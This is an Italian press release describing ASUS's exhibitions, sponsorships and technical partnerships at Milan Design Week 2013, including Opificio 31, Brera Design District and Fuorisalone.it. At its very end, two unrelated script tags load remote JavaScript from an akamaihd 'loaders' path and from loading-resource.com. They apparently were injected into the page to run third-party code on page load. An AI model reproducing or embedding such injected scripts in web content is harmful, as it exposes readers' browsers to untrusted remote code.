Una settimana densa di appuntamenti e una presenza nelle aree più prestigiose e nevralgiche della Design Week faranno di ASUS un protagonista indiscusso di questo importante appuntamento internazionale dove si rinnova l’appuntamento col design e si promuove il Design Thinking ASUS.
Anche quest’anno, la manifestazione si arricchisce di partnership di rilievo e in linea con la filosofia di ASUS, volta a una continua ricerca stilistica e spiccata vocazione all’innovazione quali punti di forza delle proprie soluzioni.
L’Azienda si presenterà con un proprio spazio espositivo al centro del cortile di Opificio 31 (via Tortona 31), in una location inaugurata per l’occasione dove, in un’atmosfera tecnologica ed emozionale, i visitatori verranno accompagnati alla scoperta dell’Authentic Beauty, tema della edizione 2013. In aggiunta a questa presenza istituzionale, ASUS sarà anche partner di prestigio del Temporary Museum for New Design di Superstudio Group, l’esclusiva mostra del design internazionale concepita come museo dell’eccellenza per dare spazio ai migliori progetti di grandi architetti o di talenti emergenti oltre che brand noti in tutto il mondo.
All’interno del Temporary Museum for New Design in via Tortona 27 la presenza di ASUS si manifesterà negli esclusivi e raffinati notebook delle linee VivoBook e Zenbook, messi a disposizione della Press Lounge insieme alle soluzioni All-in-One e tablet a supporto dell’info point. L’innovativo ASUS Taichi, incredibile connubio tra notebook e tablet, sarà invece presente all’interno di Superstudio 13, quale originale sintesi di tecnologia e raffinato design.
A dare ulteriore prestigio e spessore alla partecipazione di ASUS alla Design Week, la partnership con Fuorisalone.it e Brera Design District, due iniziative estremamente interessanti che ASUS è lieta di supportare nuovamente nell’edizione odierna, a testimonianza dell’impegno dell’Azienda verso l’eccellenza tecnologica e della sensibilità verso i temi della ricerca estetica e stilistica attraverso una continua, costante attenzione all’innovazione nel design, alle tecnologie e alle modalità di fruizione delle stesse.
Cuore pulsante del Fuorisalone, Brera Design District si caratterizza per un’elevata presenza di show room, gallerie, location e spazi dedicati al design e alle espressioni artistiche contemporanee. ASUS sarà partner tecnico del Press Point del distretto di Brera, un progetto della piattaforma Milano Design Network di Studiolabo, allestito presso Palazzo Cusani, dove i nuovi portatili touchscreen della serie ASUS VivoBook saranno a disposizione della stampa.
A tale collaborazione si aggiunge la main sponsorship del Fuorisalone.it, l’autorevole guida online nata con l’obiettivo di informare i visitatori sulle innumerevoli iniziative che segnano ogni anno il calendario del Fuorisalone, punto di riferimento per l’intera community di designer, creativi e art director che parteciperanno a questo importante appuntamento con il design internazionale.
Nell’ambito della collaborazione con Fuorisalone.it, il progetto “twindex” che nasce dalla collaborazione con il Dipartimento di Elettronica, Informazione e Bioingegneria del Politecnico di Milano e il supporto di ASUS, come iniziativa dedicata al social listening, con l’obiettivo di individuare in tempo reale le aree della città più attive sui social network e capire che cosa attrae l’attenzione e cosa le persone condividono, con una rappresentazione grafica del dialogo su twitter espresso durante la settimana del design a Milano.
ASUS sarà infine unico sponsor tecnico dell’iniziativa Food & design di RCS - cui fornirà soluzioni All-in-One e tablet a disposizione dei visitatori - oltre che sponsor del sito ATCasa e della relativa App creata per l’occasione.
Maggiori informazioni su www.asus.com
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>